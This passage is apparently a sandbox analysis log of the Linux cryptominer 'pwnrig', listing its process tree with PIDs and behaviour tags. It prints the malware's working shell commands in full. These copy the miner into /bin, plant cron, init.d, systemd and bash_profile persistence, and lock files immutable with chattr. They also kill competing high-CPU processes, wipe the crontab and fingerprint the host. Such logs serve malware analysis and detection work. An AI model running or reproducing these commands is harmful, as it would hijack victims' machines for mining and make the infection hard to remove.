chmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
4⤵
PID:1855

/usr/bin/chattr
chattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
4⤵
PID:1856

/usr/bin/which
which chkconfig
4⤵
PID:1857

/usr/bin/which
which update-rc.d
4⤵
PID:1858

/usr/bin/chattr
chattr -i -a /etc/init.d/pwnrig /bin/initdr
4⤵
PID:1859

/usr/sbin/update-rc.d
update-rc.d -f pwnrig disable
4⤵
- Flushes firewall rules
PID:1860

/usr/sbin/update-rc.d
update-rc.d -f pwnrig remove
4⤵
PID:1861

/usr/local/sbin/systemctl
systemctl daemon-reload
5⤵
PID:1862

/usr/local/bin/systemctl
systemctl daemon-reload
5⤵
PID:1862

/usr/sbin/systemctl
systemctl daemon-reload
5⤵
PID:1862

/usr/bin/systemctl
systemctl daemon-reload
5⤵
- Reads EFI boot settings
PID:1862

/usr/bin/rm
rm -rf /bin/initdr
4⤵
PID:1900

/usr/bin/cp
cp -f -r -- /tmp/service-agent /bin/initdr
4⤵
- Writes file to system bin folder
PID:1901

/usr/bin/tee
tee /etc/init.d/pwnrig
4⤵
- Modifies init.d
PID:1903

/usr/bin/sed
sed -i "1 s/-e //" /etc/init.d/pwnrig
4⤵
- Attempts to change immutable files
- Modifies init.d
PID:1905

/usr/bin/chmod
chmod +x /etc/init.d/pwnrig /bin/initdr
4⤵
PID:1906

/usr/sbin/update-rc.d
update-rc.d pwnrig defaults
4⤵
PID:1907

/usr/sbin/update-rc.d
update-rc.d pwnrig enable
4⤵
PID:1938

/usr/local/sbin/systemctl
systemctl --quiet enable pwnrig
5⤵
PID:1939

/usr/local/bin/systemctl
systemctl --quiet enable pwnrig
5⤵
PID:1939

/usr/sbin/systemctl
systemctl --quiet enable pwnrig
5⤵
PID:1939

/usr/bin/systemctl
systemctl --quiet enable pwnrig
5⤵
- Reads EFI boot settings
PID:1939

/usr/local/sbin/systemctl
systemctl daemon-reload
5⤵
PID:1940

/usr/local/bin/systemctl
systemctl daemon-reload
5⤵
PID:1940

/usr/sbin/systemctl
systemctl daemon-reload
5⤵
PID:1940

/usr/bin/systemctl
systemctl daemon-reload
5⤵
- Reads EFI boot settings
PID:1940

/usr/bin/chattr
chattr +i +a /etc/init.d/pwnrig /bin/initdr
4⤵
PID:1970

/usr/bin/which
which systemctl
4⤵
PID:1971

/usr/bin/chattr
chattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
4⤵
PID:1972

/usr/bin/rm
rm -rf /bin/sysdr
4⤵
PID:1973

/usr/bin/cp
cp -f -r -- /tmp/service-agent /bin/sysdr
4⤵
- Writes file to system bin folder
PID:1974

/usr/bin/tee
tee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
4⤵
- Modifies systemd
PID:1976

/usr/bin/sed
sed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
4⤵
PID:1977

/usr/bin/chattr
chattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
4⤵
- Attempts to change immutable files
PID:1978

/usr/bin/systemctl
systemctl enable pwnrige.service
4⤵
- Reads EFI boot settings
PID:1979

/usr/bin/systemctl
systemctl enable pwnrigl.service
4⤵
- Reads EFI boot settings
PID:2005

/usr/bin/systemctl
systemctl daemon-reload
4⤵
- Reads EFI boot settings
PID:2031

/usr/bin/systemctl
systemctl reload-or-restart pwnrige.service
4⤵
- Reads EFI boot settings
- Reads runtime system information
PID:2057

/tmp/service-agent
/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d
2⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:2114

/bin/sh
sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
3⤵
PID:2138

/usr/bin/whoami
whoami
4⤵
PID:2149

/usr/bin/hostname
hostname
4⤵
PID:2150

/usr/bin/grep
grep -c "^processor" /proc/cpuinfo
4⤵
- Checks CPU configuration
PID:2151

/bin/sh
sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
3⤵
PID:2167

/usr/bin/awk
awk "/[zZ]/ && !a[\$2]++ {print \$2}"
4⤵
PID:2169

/usr/bin/ps
ps -A "-ostat,ppid"
4⤵
- Reads CPU attributes
- Reads runtime system information
PID:2168

/usr/bin/id
id -u
4⤵
PID:2171

/usr/bin/grep
grep -v grep
4⤵
PID:2174

/usr/bin/grep
grep /etc/cron
4⤵
PID:2173

/usr/bin/ps
ps x
4⤵
- Reads runtime system information
PID:2172

/bin/sh
sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
3⤵
PID:2176

/usr/bin/id
id -u
4⤵
PID:2177

/usr/bin/awk
awk "{if(\$3>30.0) print \$2}"
4⤵
PID:2182

/usr/bin/grep
grep -v /usr/sbin/httpd
4⤵
PID:2181

/usr/bin/grep
grep -v -- "-bash[[:space:]]*\$"
4⤵
PID:2180

/usr/bin/grep
grep -v grep
4⤵
PID:2179

/usr/bin/ps
ps aux
4⤵
PID:2178

/bin/sh
sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
3⤵
PID:2186

/usr/bin/id
id -u
4⤵
PID:2187

/usr/bin/crontab
crontab -r
2⤵
PID:3860

/usr/bin/pkill
pkill -f .klibsystem5
2⤵
PID:3861

/usr/bin/pkill
pkill -f .klibsystem4
2⤵
- Reads runtime system information
PID:3862

/usr/bin/bash
bash -c "echo \"* * * * * /home/.klibsystem5 >/dev/null 2>&1\" | crontab -"
2⤵
PID:3863

/usr/bin/crontab
crontab -
3⤵
- Creates/modifies Cron job
PID:3865

/tmp/sys-helper
/tmp/sys-helper
2⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:3866

/tmp/service-agent
/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn
2⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:3867

/bin/sh
sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
3⤵
PID:3868

/usr/bin/whoami
whoami
4⤵
PID:3879

/usr/bin/hostname
hostname
4⤵
PID:3880

/usr/bin/grep
grep -c "^processor" /proc/cpuinfo
4⤵
- Checks CPU configuration
PID:3881

/bin/sh
sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
3⤵
PID:3897

/usr/bin/awk
awk "/[zZ]/ && !a[\$2]++ {print \$2}"
4⤵
PID:3899

/usr/bin/ps
ps -A "-ostat,ppid"
4⤵
- Reads CPU attributes
PID:3898

/usr/bin/id
id -u
4⤵
PID:3901

/usr/bin/grep
grep -v grep
4⤵
PID:3904

/usr/bin/grep
grep /etc/cron
4⤵
PID:3903

/usr/bin/ps
ps x
4⤵
- Reads CPU attributes
PID:3902

/bin/sh
sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"
3⤵
- Writes file to tmp directory
PID:3906

/usr/bin/id
id -u
4⤵
PID:3907

/usr/bin/id
id -u
4⤵
PID:3908

/usr/bin/chattr
chattr -i -a /bin/bprofr "~/.bash_profile"
4⤵
PID:3909

/usr/bin/rm
rm -rf /bin/bprofr
4⤵
PID:3910

/usr/bin/sed
sed -i /bprofr/d "~/.bash_profile"
4⤵
PID:3911

/usr/bin/cp
cp -f -r -- /tmp/service-agent /bin/bprofr
4⤵
- Writes file to system bin folder
PID:3912

/usr/bin/id
id -u
4⤵
PID:3913

/usr/bin/chattr
chattr +i +a /bin/bprofr "~/.bash_profile"
4⤵
PID:3914

/usr/bin/mkdir
mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly
4⤵
PID:3915

/usr/bin/chattr
chattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
4⤵
- Attempts to change immutable files
PID:3916

/usr/bin/rm
rm -rf /bin/crondr
4⤵
PID:3917

/usr/bin/cp
cp -f -r -- /tmp/service-agent /bin/crondr
4⤵
- Writes file to system bin folder
PID:3918

/usr/bin/tee
tee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
4⤵
- Creates/modifies Cron job
PID:3920

/usr/bin/sed
sed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
4⤵
- Creates/modifies Cron job
PID:3921

/usr/bin/chmod
chmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
4⤵
PID:3922

/usr/bin/chattr
chattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
4⤵
PID:3923

/usr/bin/which
which chkconfig
4⤵
PID:3924

/usr/bin/which
which update-rc.d
4⤵
PID:3925

/usr/bin/chattr
chattr -i -a /etc/init.d/pwnrig /bin/initdr
4⤵
PID:3926

/usr/sbin/update-rc.d
update-rc.d -f pwnrig disable
4⤵
- Flushes firewall rules
PID:3927

/usr/local/sbin/systemctl
systemctl --quiet disable pwnrig
5⤵
PID:3928

/usr/local/bin/systemctl
systemctl --quiet disable pwnrig
5⤵
PID:3928

/usr/sbin/systemctl
systemctl --quiet disable pwnrig
5⤵
PID:3928

/usr/bin/systemctl
systemctl --quiet disable pwnrig
5⤵
- Reads EFI boot settings
- Enumerates kernel/hardware configuration
PID:3928

/usr/local/sbin/systemctl
systemctl daemon-reload
5⤵
PID:3954

/usr/local/bin/systemctl
systemctl daemon-reload
5⤵
PID:3954

/usr/sbin/systemctl
systemctl daemon-reload
5⤵
PID:3954

/usr/bin/systemctl
systemctl daemon-reload
5⤵
- Reads EFI boot settings
PID:3954

/usr/sbin/update-rc.d
update-rc.d -f pwnrig remove
4⤵
PID:3980

/usr/local/sbin/systemctl
systemctl daemon-reload
5⤵
PID:3981

/usr/local/bin/systemctl
systemctl daemon-reload
5⤵
PID:3981

/usr/sbin/systemctl
systemctl daemon-reload
5⤵
PID:3981

/usr/bin/systemctl
systemctl daemon-reload
5⤵
- Reads EFI boot settings
PID:3981

/usr/bin/rm
rm -rf /bin/initdr
4⤵
PID:4007

/usr/bin/cp
cp -f -r -- /tmp/service-agent /bin/initdr
4⤵
- Writes file to system bin folder
PID:4008

/usr/bin/tee
tee /etc/init.d/pwnrig
4⤵
- Modifies init.d
PID:4010

/usr/bin/sed
sed -i "1 s/-e //" /etc/init.d/pwnrig
4⤵
- Attempts to change immutable files
- Modifies init.d
PID:4011

/usr/bin/chmod
chmod +x /etc/init.d/pwnrig /bin/initdr
4⤵
PID:4012

/usr/sbin/update-rc.d
update-rc.d pwnrig defaults
4⤵
PID:4013

/usr/sbin/update-rc.d
update-rc.d pwnrig enable
4⤵
PID:4040

/usr/local/sbin/systemctl
systemctl --quiet enable pwnrig
5⤵
PID:4041

/usr/local/bin/systemctl
systemctl --quiet enable pwnrig
5⤵
PID:4041

/usr/sbin/systemctl
systemctl --quiet enable pwnrig
5⤵
PID:4041

/usr/bin/systemctl
systemctl --quiet enable pwnrig
5⤵
- Reads EFI boot settings
PID:4041

/usr/local/sbin/systemctl
systemctl daemon-reload
5⤵
PID:4042

/usr/local/bin/systemctl
systemctl daemon-reload
5⤵
PID:4042

/usr/sbin/systemctl
systemctl daemon-reload
5⤵
PID:4042

/usr/bin/systemctl
systemctl daemon-reload
5⤵
- Reads EFI boot settings
PID:4042

/usr/bin/chattr
chattr +i +a /etc/init.d/pwnrig /bin/initdr
4⤵
PID:4068

/usr/bin/which
which systemctl
4⤵
PID:4069

/usr/bin/chattr
chattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
4⤵
PID:4070

/usr/bin/rm
rm -rf /bin/sysdr
4⤵
PID:4071

/usr/bin/cp
cp -f -r -- /tmp/service-agent /bin/sysdr
4⤵
- Writes file to system bin folder
PID:4072

/usr/bin/tee
tee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
4⤵
- Modifies systemd
PID:4074

/usr/bin/sed
sed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
4⤵
PID:4075

/usr/bin/chattr
chattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
4⤵
PID:4076

/usr/bin/systemctl
systemctl enable pwnrige.service
4⤵
- Reads EFI boot settings
PID:4077

/usr/bin/systemctl
systemctl enable pwnrigl.service
4⤵
- Reads EFI boot settings
PID:4103

/usr/bin/systemctl
systemctl daemon-reload
4⤵
- Reads EFI boot settings
PID:4129

/usr/bin/systemctl
systemctl reload-or-restart pwnrige.service
4⤵
- Reads EFI boot settings
PID:4155

/tmp/service-agent
/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d
2⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:4211

/bin/sh
sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
3⤵
- Attempts to change immutable files
PID:4235

/usr/bin/whoami
whoami
4⤵
PID:4246

/usr/bin/hostname
hostname
4⤵
PID:4247

/usr/bin/grep
grep -c "^processor" /proc/cpuinfo
4⤵
- Checks CPU configuration
PID:4248

/bin/sh
sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
3⤵
PID:4264

/usr/bin/awk
awk "/[zZ]/ && !a[\$2]++ {print \$2}"
4⤵
PID:4266

/usr/bin/ps
ps -A "-ostat,ppid"
4⤵
- Reads CPU attributes
- Reads runtime system information
PID:4265

/usr/bin/id
id -u
4⤵
PID:4268

/usr/bin/grep
grep -v grep
4⤵
PID:4271

/usr/bin/grep
grep /etc/cron
4⤵
PID:4270

/usr/bin/ps
ps x
4⤵
- Reads CPU attributes
- Reads runtime system information
PID:4269

/bin/sh
sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
3⤵
PID:4273

/usr/bin/id
id -u
4⤵
PID:4274

/usr/bin/awk
awk "{if(\$3>30.0) print \$2}"
4⤵
PID:4279

/usr/bin/grep
grep -v /usr/sbin/httpd
4⤵
PID:4278

/usr/bin/grep
grep -v -- "-bash[[:space:]]*\$"
4⤵
PID:4277

/usr/bin/grep
grep -v grep
4⤵
PID:4276

/usr/bin/ps
ps aux
4⤵
- Reads runtime system information
PID:4275

/bin/sh
